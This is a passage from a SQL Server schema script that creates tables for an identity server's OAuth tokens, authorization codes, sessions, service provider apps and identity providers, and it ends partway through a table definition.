IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH1A_ACCESS_TOKEN]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH1A_ACCESS_TOKEN (
ACCESS_TOKEN VARCHAR(512),
ACCESS_TOKEN_SECRET VARCHAR(512),
CONSUMER_KEY_ID INTEGER,
SCOPE VARCHAR(2048),
AUTHZ_USER VARCHAR(512),
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY (ACCESS_TOKEN),
FOREIGN KEY (CONSUMER_KEY_ID) REFERENCES IDN_OAUTH_CONSUMER_APPS(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH2_ACCESS_TOKEN]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH2_ACCESS_TOKEN (
TOKEN_ID VARCHAR (255),
ACCESS_TOKEN VARCHAR(2048),
REFRESH_TOKEN VARCHAR(2048),
CONSUMER_KEY_ID INTEGER,
AUTHZ_USER VARCHAR (100),
TENANT_ID INTEGER,
USER_DOMAIN VARCHAR(50),
USER_TYPE VARCHAR (25),
GRANT_TYPE VARCHAR (50),
TIME_CREATED DATETIME,
REFRESH_TOKEN_TIME_CREATED DATETIME,
VALIDITY_PERIOD BIGINT,
REFRESH_TOKEN_VALIDITY_PERIOD BIGINT,
TOKEN_SCOPE_HASH VARCHAR(32),
TOKEN_STATE VARCHAR(25) DEFAULT 'ACTIVE',
TOKEN_STATE_ID VARCHAR (128) DEFAULT 'NONE',
SUBJECT_IDENTIFIER VARCHAR(255),
ACCESS_TOKEN_HASH VARCHAR(512),
REFRESH_TOKEN_HASH VARCHAR(512),
IDP_ID INTEGER DEFAULT -1 NOT NULL,
TOKEN_BINDING_REF VARCHAR (32) DEFAULT 'NONE',
PRIMARY KEY (TOKEN_ID),
FOREIGN KEY (CONSUMER_KEY_ID) REFERENCES IDN_OAUTH_CONSUMER_APPS(ID) ON DELETE CASCADE,
CONSTRAINT CON_APP_KEY UNIQUE (CONSUMER_KEY_ID,AUTHZ_USER,TENANT_ID,USER_DOMAIN,USER_TYPE,TOKEN_SCOPE_HASH,
TOKEN_STATE,TOKEN_STATE_ID,IDP_ID,TOKEN_BINDING_REF)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH2_TOKEN_BINDING]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH2_TOKEN_BINDING (
TOKEN_ID VARCHAR (255),
TOKEN_BINDING_TYPE VARCHAR (32),
TOKEN_BINDING_REF VARCHAR (32),
TOKEN_BINDING_VALUE VARCHAR (1024),
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY (TOKEN_ID),
FOREIGN KEY (TOKEN_ID) REFERENCES IDN_OAUTH2_ACCESS_TOKEN(TOKEN_ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH2_ACCESS_TOKEN_AUDIT]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH2_ACCESS_TOKEN_AUDIT (
TOKEN_ID VARCHAR (255),
ACCESS_TOKEN VARCHAR(2048),
REFRESH_TOKEN VARCHAR(2048),
CONSUMER_KEY_ID INTEGER,
AUTHZ_USER VARCHAR (100),
TENANT_ID INTEGER,
USER_DOMAIN VARCHAR(50),
USER_TYPE VARCHAR (25),
GRANT_TYPE VARCHAR (50),
TIME_CREATED DATETIME,
REFRESH_TOKEN_TIME_CREATED DATETIME,
VALIDITY_PERIOD BIGINT,
REFRESH_TOKEN_VALIDITY_PERIOD BIGINT,
TOKEN_SCOPE_HASH VARCHAR(32),
TOKEN_STATE VARCHAR(25),
TOKEN_STATE_ID VARCHAR (128) ,
SUBJECT_IDENTIFIER VARCHAR(255),
ACCESS_TOKEN_HASH VARCHAR(512),
REFRESH_TOKEN_HASH VARCHAR(512),
INVALIDATED_TIME DATETIME,
IDP_ID INTEGER DEFAULT -1 NOT NULL
);
IF EXISTS (SELECT NAME FROM SYSINDEXES WHERE NAME = 'IDX_AT_CK_AU')
DROP INDEX IDN_OAUTH2_ACCESS_TOKEN.IDX_AT_CK_AU
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH2_AUTHORIZATION_CODE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH2_AUTHORIZATION_CODE (
CODE_ID VARCHAR (255),
AUTHORIZATION_CODE VARCHAR(2048),
CONSUMER_KEY_ID INTEGER,
CALLBACK_URL VARCHAR(2048),
SCOPE VARCHAR(2048),
AUTHZ_USER VARCHAR (100),
TENANT_ID INTEGER,
USER_DOMAIN VARCHAR(50),
TIME_CREATED DATETIME,
VALIDITY_PERIOD BIGINT,
STATE VARCHAR (25) DEFAULT 'ACTIVE',
TOKEN_ID VARCHAR(255),
SUBJECT_IDENTIFIER VARCHAR(255),
PKCE_CODE_CHALLENGE VARCHAR (255),
PKCE_CODE_CHALLENGE_METHOD VARCHAR(128),
AUTHORIZATION_CODE_HASH VARCHAR(512),
IDP_ID INTEGER DEFAULT -1 NOT NULL,
PRIMARY KEY (CODE_ID),
FOREIGN KEY (CONSUMER_KEY_ID) REFERENCES IDN_OAUTH_CONSUMER_APPS(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH2_AUTHZ_CODE_SCOPE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH2_AUTHZ_CODE_SCOPE (
CODE_ID VARCHAR (255),
SCOPE VARCHAR (60),
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY (CODE_ID, SCOPE),
FOREIGN KEY (CODE_ID) REFERENCES IDN_OAUTH2_AUTHORIZATION_CODE(CODE_ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH2_DEVICE_FLOW]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH2_DEVICE_FLOW (
CODE_ID VARCHAR(255),
DEVICE_CODE VARCHAR(255),
USER_CODE VARCHAR(25),
CONSUMER_KEY_ID INTEGER,
LAST_POLL_TIME DATETIME NOT NULL,
EXPIRY_TIME DATETIME NOT NULL,
TIME_CREATED DATETIME NOT NULL,
POLL_TIME BIGINT,
STATUS VARCHAR (25) DEFAULT 'PENDING',
AUTHZ_USER VARCHAR (100),
TENANT_ID INTEGER,
USER_DOMAIN VARCHAR(50),
IDP_ID INTEGER,
PRIMARY KEY (DEVICE_CODE),
UNIQUE (CODE_ID),
UNIQUE (USER_CODE),
FOREIGN KEY (CONSUMER_KEY_ID) REFERENCES IDN_OAUTH_CONSUMER_APPS(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH2_DEVICE_FLOW_SCOPES]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH2_DEVICE_FLOW_SCOPES (
ID INTEGER NOT NULL IDENTITY,
SCOPE_ID VARCHAR(255),
SCOPE VARCHAR(255),
PRIMARY KEY (ID),
FOREIGN KEY (SCOPE_ID) REFERENCES IDN_OAUTH2_DEVICE_FLOW(CODE_ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH2_ACCESS_TOKEN_SCOPE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH2_ACCESS_TOKEN_SCOPE (
TOKEN_ID VARCHAR (255),
TOKEN_SCOPE VARCHAR (60),
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY (TOKEN_ID, TOKEN_SCOPE),
FOREIGN KEY (TOKEN_ID) REFERENCES IDN_OAUTH2_ACCESS_TOKEN(TOKEN_ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH2_SCOPE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH2_SCOPE (
SCOPE_ID INTEGER IDENTITY,
NAME VARCHAR(255) NOT NULL,
DISPLAY_NAME VARCHAR(255) NOT NULL,
DESCRIPTION VARCHAR(512),
TENANT_ID INTEGER NOT NULL DEFAULT -1,
SCOPE_TYPE VARCHAR(255) NOT NULL,
PRIMARY KEY (SCOPE_ID),
UNIQUE (NAME, TENANT_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH2_SCOPE_BINDING]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH2_SCOPE_BINDING (
SCOPE_ID INTEGER NOT NULL,
SCOPE_BINDING VARCHAR(255) NOT NULL,
BINDING_TYPE VARCHAR(255) NOT NULL,
FOREIGN KEY (SCOPE_ID) REFERENCES IDN_OAUTH2_SCOPE(SCOPE_ID) ON DELETE CASCADE,
UNIQUE (SCOPE_ID, SCOPE_BINDING, BINDING_TYPE)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH2_RESOURCE_SCOPE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH2_RESOURCE_SCOPE (
RESOURCE_PATH VARCHAR(255) NOT NULL,
SCOPE_ID INTEGER NOT NULL,
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY (RESOURCE_PATH),
FOREIGN KEY (SCOPE_ID) REFERENCES IDN_OAUTH2_SCOPE (SCOPE_ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_SCIM_GROUP]') AND TYPE IN (N'U'))
CREATE TABLE IDN_SCIM_GROUP (
ID INTEGER IDENTITY,
TENANT_ID INTEGER NOT NULL,
ROLE_NAME VARCHAR(255) NOT NULL,
ATTR_NAME VARCHAR(1024) NOT NULL,
ATTR_VALUE VARCHAR(1024),
PRIMARY KEY (ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OPENID_REMEMBER_ME]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OPENID_REMEMBER_ME (
USER_NAME VARCHAR(255) NOT NULL,
TENANT_ID INTEGER DEFAULT 0,
COOKIE_VALUE VARCHAR(1024),
CREATED_TIME DATETIME,
PRIMARY KEY (USER_NAME, TENANT_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OPENID_USER_RPS]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OPENID_USER_RPS (
USER_NAME VARCHAR(255) NOT NULL,
TENANT_ID INTEGER DEFAULT 0,
RP_URL VARCHAR(255) NOT NULL,
TRUSTED_ALWAYS VARCHAR(128) DEFAULT 'FALSE',
LAST_VISIT DATE NOT NULL,
VISIT_COUNT INTEGER DEFAULT 0,
DEFAULT_PROFILE_NAME VARCHAR(255) DEFAULT 'DEFAULT',
PRIMARY KEY (USER_NAME, TENANT_ID, RP_URL)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OPENID_ASSOCIATIONS]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OPENID_ASSOCIATIONS (
HANDLE VARCHAR(255) NOT NULL,
ASSOC_TYPE VARCHAR(255) NOT NULL,
EXPIRE_IN DATETIME NOT NULL,
MAC_KEY VARCHAR(255) NOT NULL,
ASSOC_STORE VARCHAR(128) DEFAULT 'SHARED',
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY (HANDLE)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_STS_STORE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_STS_STORE (
ID INTEGER IDENTITY,
TOKEN_ID VARCHAR(255) NOT NULL,
TOKEN_CONTENT VARBINARY(MAX) NOT NULL,
CREATE_DATE DATETIME NOT NULL,
EXPIRE_DATE DATETIME NOT NULL,
STATE INTEGER DEFAULT 0,
PRIMARY KEY (ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_IDENTITY_USER_DATA]') AND TYPE IN (N'U'))
CREATE TABLE IDN_IDENTITY_USER_DATA (
TENANT_ID INTEGER DEFAULT -1234,
USER_NAME VARCHAR(255) NOT NULL,
DATA_KEY VARCHAR(255) NOT NULL,
DATA_VALUE VARCHAR(2048),
PRIMARY KEY (TENANT_ID, USER_NAME, DATA_KEY)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_IDENTITY_META_DATA]') AND TYPE IN (N'U'))
CREATE TABLE IDN_IDENTITY_META_DATA (
USER_NAME VARCHAR(255) NOT NULL,
TENANT_ID INTEGER DEFAULT -1234,
METADATA_TYPE VARCHAR(255) NOT NULL,
METADATA VARCHAR(255) NOT NULL,
VALID VARCHAR(255) NOT NULL,
PRIMARY KEY (TENANT_ID, USER_NAME, METADATA_TYPE,METADATA)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_THRIFT_SESSION]') AND TYPE IN (N'U'))
CREATE TABLE IDN_THRIFT_SESSION (
SESSION_ID VARCHAR(255) NOT NULL,
USER_NAME VARCHAR(255) NOT NULL,
CREATED_TIME VARCHAR(255) NOT NULL,
LAST_MODIFIED_TIME VARCHAR(255) NOT NULL,
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY (SESSION_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_AUTH_SESSION_STORE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_AUTH_SESSION_STORE (
SESSION_ID VARCHAR (100) NOT NULL,
SESSION_TYPE VARCHAR(100) NOT NULL,
OPERATION VARCHAR(10) NOT NULL,
SESSION_OBJECT VARBINARY(MAX),
TIME_CREATED BIGINT,
TENANT_ID INTEGER DEFAULT -1,
EXPIRY_TIME BIGINT,
PRIMARY KEY (SESSION_ID, SESSION_TYPE, TIME_CREATED, OPERATION)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_AUTH_SESSION_APP_INFO]') AND TYPE IN (N'U'))
CREATE TABLE IDN_AUTH_SESSION_APP_INFO (
SESSION_ID VARCHAR (100) NOT NULL,
SUBJECT VARCHAR (100) NOT NULL,
APP_ID INTEGER NOT NULL,
INBOUND_AUTH_TYPE VARCHAR (255) NOT NULL,
PRIMARY KEY (SESSION_ID, SUBJECT, APP_ID, INBOUND_AUTH_TYPE)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_AUTH_SESSION_META_DATA]') AND TYPE IN (N'U'))
CREATE TABLE IDN_AUTH_SESSION_META_DATA (
SESSION_ID VARCHAR (100) NOT NULL,
PROPERTY_TYPE VARCHAR (100) NOT NULL,
VALUE VARCHAR (255) NOT NULL,
PRIMARY KEY (SESSION_ID, PROPERTY_TYPE, VALUE)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_AUTH_TEMP_SESSION_STORE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_AUTH_TEMP_SESSION_STORE (
SESSION_ID VARCHAR (100) NOT NULL,
SESSION_TYPE VARCHAR(100) NOT NULL,
OPERATION VARCHAR(10) NOT NULL,
SESSION_OBJECT VARBINARY(MAX),
TIME_CREATED BIGINT,
TENANT_ID INTEGER DEFAULT -1,
EXPIRY_TIME BIGINT,
PRIMARY KEY (SESSION_ID, SESSION_TYPE, TIME_CREATED, OPERATION)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_AUTH_USER]') AND TYPE IN (N'U'))
CREATE TABLE IDN_AUTH_USER (
USER_ID VARCHAR(255) NOT NULL,
USER_NAME VARCHAR(255) NOT NULL,
TENANT_ID INTEGER NOT NULL,
DOMAIN_NAME VARCHAR(255) NOT NULL,
IDP_ID INTEGER NOT NULL,
PRIMARY KEY (USER_ID),
CONSTRAINT USER_STORE_CONSTRAINT UNIQUE (USER_NAME, TENANT_ID, DOMAIN_NAME, IDP_ID));
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_AUTH_USER_SESSION_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE IDN_AUTH_USER_SESSION_MAPPING (
USER_ID VARCHAR(255) NOT NULL,
SESSION_ID VARCHAR(255) NOT NULL,
CONSTRAINT USER_SESSION_STORE_CONSTRAINT UNIQUE (USER_ID, SESSION_ID));
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[SP_APP]') AND TYPE IN (N'U'))
CREATE TABLE SP_APP (
ID INTEGER NOT NULL IDENTITY,
TENANT_ID INTEGER NOT NULL,
APP_NAME VARCHAR (255) NOT NULL ,
USER_STORE VARCHAR (255) NOT NULL,
USERNAME VARCHAR (255) NOT NULL ,
DESCRIPTION VARCHAR (1024),
ROLE_CLAIM VARCHAR (512),
AUTH_TYPE VARCHAR (255) NOT NULL,
PROVISIONING_USERSTORE_DOMAIN VARCHAR (512),
IS_LOCAL_CLAIM_DIALECT CHAR(1) DEFAULT '1',
IS_SEND_LOCAL_SUBJECT_ID CHAR(1) DEFAULT '0',
IS_SEND_AUTH_LIST_OF_IDPS CHAR(1) DEFAULT '0',
IS_USE_TENANT_DOMAIN_SUBJECT CHAR(1) DEFAULT '1',
IS_USE_USER_DOMAIN_SUBJECT CHAR(1) DEFAULT '1',
ENABLE_AUTHORIZATION CHAR(1) DEFAULT '0',
SUBJECT_CLAIM_URI VARCHAR (512),
IS_SAAS_APP CHAR(1) DEFAULT '0',
IS_DUMB_MODE CHAR(1) DEFAULT '0',
UUID CHAR(36),
IMAGE_URL VARCHAR(1024),
ACCESS_URL VARCHAR(1024),
IS_DISCOVERABLE CHAR(1) DEFAULT '0',
PRIMARY KEY (ID),
CONSTRAINT APPLICATION_NAME_CONSTRAINT UNIQUE(APP_NAME, TENANT_ID),
CONSTRAINT APPLICATION_UUID_CONSTRAINT UNIQUE(UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[SP_METADATA]') AND TYPE IN (N'U'))
CREATE TABLE SP_METADATA (
ID INTEGER IDENTITY,
SP_ID INTEGER,
NAME VARCHAR(255) NOT NULL,
VALUE VARCHAR(255) NOT NULL,
DISPLAY_NAME VARCHAR(255),
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY (ID),
CONSTRAINT SP_METADATA_CONSTRAINT UNIQUE (SP_ID, NAME),
FOREIGN KEY (SP_ID) REFERENCES SP_APP(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[SP_INBOUND_AUTH]') AND TYPE IN (N'U'))
CREATE TABLE SP_INBOUND_AUTH (
ID INTEGER NOT NULL IDENTITY,
TENANT_ID INTEGER NOT NULL,
INBOUND_AUTH_KEY VARCHAR (255),
INBOUND_AUTH_TYPE VARCHAR (255) NOT NULL,
INBOUND_CONFIG_TYPE VARCHAR (255) NOT NULL,
PROP_NAME VARCHAR (255),
PROP_VALUE VARCHAR (1024) ,
APP_ID INTEGER NOT NULL,
PRIMARY KEY (ID),
CONSTRAINT APPLICATION_ID_CONSTRAINT FOREIGN KEY (APP_ID) REFERENCES SP_APP (ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[SP_AUTH_STEP]') AND TYPE IN (N'U'))
CREATE TABLE SP_AUTH_STEP (
ID INTEGER NOT NULL IDENTITY,
TENANT_ID INTEGER NOT NULL,
STEP_ORDER INTEGER DEFAULT 1,
APP_ID INTEGER NOT NULL,
IS_SUBJECT_STEP CHAR(1) DEFAULT '0',
IS_ATTRIBUTE_STEP CHAR(1) DEFAULT '0',
PRIMARY KEY (ID),
CONSTRAINT APPLICATION_ID_CONSTRAINT_STEP FOREIGN KEY (APP_ID) REFERENCES SP_APP (ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[SP_FEDERATED_IDP]') AND TYPE IN (N'U'))
CREATE TABLE SP_FEDERATED_IDP (
ID INTEGER NOT NULL,
TENANT_ID INTEGER NOT NULL,
AUTHENTICATOR_ID INTEGER NOT NULL,
PRIMARY KEY (ID, AUTHENTICATOR_ID),
CONSTRAINT STEP_ID_CONSTRAINT FOREIGN KEY (ID) REFERENCES SP_AUTH_STEP (ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[SP_CLAIM_DIALECT]') AND TYPE IN (N'U'))
CREATE TABLE SP_CLAIM_DIALECT (
ID INTEGER NOT NULL IDENTITY,
TENANT_ID INTEGER NOT NULL,
SP_DIALECT VARCHAR (512) NOT NULL,
APP_ID INTEGER NOT NULL,
PRIMARY KEY (ID),
CONSTRAINT DIALECTID_APPID_CONSTRAINT FOREIGN KEY (APP_ID) REFERENCES SP_APP (ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[SP_CLAIM_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE SP_CLAIM_MAPPING (
ID INTEGER NOT NULL IDENTITY,
TENANT_ID INTEGER NOT NULL,
IDP_CLAIM VARCHAR (512) NOT NULL ,
SP_CLAIM VARCHAR (512) NOT NULL ,
APP_ID INTEGER NOT NULL,
IS_REQUESTED VARCHAR(128) DEFAULT '0',
IS_MANDATORY VARCHAR(128) DEFAULT '0',
DEFAULT_VALUE VARCHAR(255),
PRIMARY KEY (ID),
CONSTRAINT CLAIMID_APPID_CONSTRAINT FOREIGN KEY (APP_ID) REFERENCES SP_APP (ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[SP_ROLE_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE SP_ROLE_MAPPING (
ID INTEGER NOT NULL IDENTITY,
TENANT_ID INTEGER NOT NULL,
IDP_ROLE VARCHAR (255) NOT NULL ,
SP_ROLE VARCHAR (255) NOT NULL ,
APP_ID INTEGER NOT NULL,
PRIMARY KEY (ID),
CONSTRAINT ROLEID_APPID_CONSTRAINT FOREIGN KEY (APP_ID) REFERENCES SP_APP (ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[SP_REQ_PATH_AUTHENTICATOR]') AND TYPE IN (N'U'))
CREATE TABLE SP_REQ_PATH_AUTHENTICATOR (
ID INTEGER NOT NULL IDENTITY,
TENANT_ID INTEGER NOT NULL,
AUTHENTICATOR_NAME VARCHAR (255) NOT NULL ,
APP_ID INTEGER NOT NULL,
PRIMARY KEY (ID),
CONSTRAINT REQ_AUTH_APPID_CONSTRAINT FOREIGN KEY (APP_ID) REFERENCES SP_APP (ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[SP_PROVISIONING_CONNECTOR]') AND TYPE IN (N'U'))
CREATE TABLE SP_PROVISIONING_CONNECTOR (
ID INTEGER NOT NULL IDENTITY,
TENANT_ID INTEGER NOT NULL,
IDP_NAME VARCHAR (255) NOT NULL ,
CONNECTOR_NAME VARCHAR (255) NOT NULL ,
APP_ID INTEGER NOT NULL,
IS_JIT_ENABLED CHAR(1) NOT NULL DEFAULT '0',
BLOCKING CHAR(1) NOT NULL DEFAULT '0',
RULE_ENABLED CHAR(1) NOT NULL DEFAULT '0',
PRIMARY KEY (ID),
CONSTRAINT PRO_CONNECTOR_APPID_CONSTRAINT FOREIGN KEY (APP_ID) REFERENCES SP_APP (ID) ON DELETE CASCADE
);
IF NOT EXISTS(SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[SP_AUTH_SCRIPT]') AND TYPE IN (N'U'))
CREATE TABLE SP_AUTH_SCRIPT (
ID INTEGER IDENTITY NOT NULL,
TENANT_ID INTEGER NOT NULL,
APP_ID INTEGER NOT NULL,
TYPE VARCHAR(255) NOT NULL,
CONTENT VARBINARY(MAX) DEFAULT NULL,
IS_ENABLED CHAR(1) NOT NULL DEFAULT '0',
PRIMARY KEY (ID)
);
IF NOT EXISTS(SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[SP_TEMPLATE]') AND TYPE IN (N'U'))
CREATE TABLE SP_TEMPLATE (
ID INTEGER NOT NULL IDENTITY,
TENANT_ID INTEGER NOT NULL,
NAME VARCHAR(255) NOT NULL,
DESCRIPTION VARCHAR(1023),
CONTENT VARBINARY(MAX) DEFAULT NULL,
PRIMARY KEY (ID),
CONSTRAINT SP_TEMPLATE_CONSTRAINT UNIQUE (TENANT_ID, NAME)
);
IF NOT EXISTS(SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_AUTH_WAIT_STATUS]') AND TYPE IN (N'U'))
CREATE TABLE IDN_AUTH_WAIT_STATUS (
ID INTEGER IDENTITY NOT NULL,
TENANT_ID INTEGER NOT NULL,
LONG_WAIT_KEY VARCHAR(255) NOT NULL,
WAIT_STATUS CHAR(1) NOT NULL DEFAULT '1',
TIME_CREATED DATETIME,
EXPIRE_TIME DATETIME,
PRIMARY KEY (ID),
CONSTRAINT IDN_AUTH_WAIT_STATUS_KEY UNIQUE (LONG_WAIT_KEY)
);
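-- Identity Provider (IDP) tables --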
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDP]') AND TYPE IN (N'U'))
CREATE TABLE IDP (
ID INTEGER IDENTITY,
TENANT_ID INTEGER,
NAME VARCHAR(254) NOT NULL,
IS_ENABLED CHAR(1) NOT NULL DEFAULT '1',
IS_PRIMARY CHAR(1) NOT NULL DEFAULT '0',
HOME_REALM_ID VARCHAR(254),
IMAGE VARBINARY(MAX),
CERTIFICATE VARBINARY(MAX),
ALIAS VARCHAR(254),
INBOUND_PROV_ENABLED CHAR(1) NOT NULL DEFAULT '0',
INBOUND_PROV_USER_STORE_ID VARCHAR(254),
USER_CLAIM_URI VARCHAR(254),
ROLE_CLAIM_URI VARCHAR(254),
DESCRIPTION VARCHAR(1024),
DEFAULT_AUTHENTICATOR_NAME VARCHAR(254),
DEFAULT_PRO_CONNECTOR_NAME VARCHAR(254),
PROVISIONING_ROLE VARCHAR(128),
IS_FEDERATION_HUB CHAR(1) NOT NULL DEFAULT '0',
IS_LOCAL_CLAIM_DIALECT CHAR(1) NOT NULL DEFAULT '0',
PRIMARY KEY (ID),
DISPLAY_NAME VARCHAR(255),
IMAGE_URL VARCHAR(1024),
UUID CHAR(36) NOT NULL,
UNIQUE (TENANT_ID, NAME),
UNIQUE (UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDP_ROLE]') AND TYPE IN (N'U'))
CREATE TABLE IDP_ROLE (
ID INTEGER IDENTITY,
IDP_ID INTEGER,
TENANT_ID INTEGER,
ROLE VARCHAR(254),
PRIMARY KEY (ID),
UNIQUE (IDP_ID, ROLE),
FOREIGN KEY (IDP_ID) REFERENCES IDP(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDP_ROLE_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE IDP_ROLE_MAPPING (
ID INTEGER IDENTITY,
IDP_ROLE_ID INTEGER,
TENANT_ID INTEGER,
USER_STORE_ID VARCHAR (253),
LOCAL_ROLE VARCHAR(253),
PRIMARY KEY (ID),
UNIQUE (IDP_ROLE_ID, TENANT_ID, USER_STORE_ID, LOCAL_ROLE),
FOREIGN KEY (IDP_ROLE_ID) REFERENCES IDP_ROLE(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDP_CLAIM]') AND TYPE IN (N'U'))
CREATE TABLE IDP_CLAIM (
ID INTEGER IDENTITY,
IDP_ID INTEGER,
TENANT_ID INTEGER,
CLAIM VARCHAR(254),
PRIMARY KEY (ID),
UNIQUE (IDP_ID, CLAIM),
